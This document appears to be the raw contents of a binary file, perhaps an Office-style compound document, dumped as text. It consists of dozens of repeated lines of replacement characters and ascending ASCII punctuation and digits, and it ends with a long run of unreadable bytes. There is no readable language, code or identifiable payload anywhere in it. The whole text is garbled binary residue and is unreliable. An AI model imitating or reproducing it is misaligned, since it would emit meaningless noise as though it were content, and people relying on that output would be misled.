���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	

����<$���� !"#%&'()*+,-./0123456789:;����=>?@ABCDEFGHIJKLMNOPQRST������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������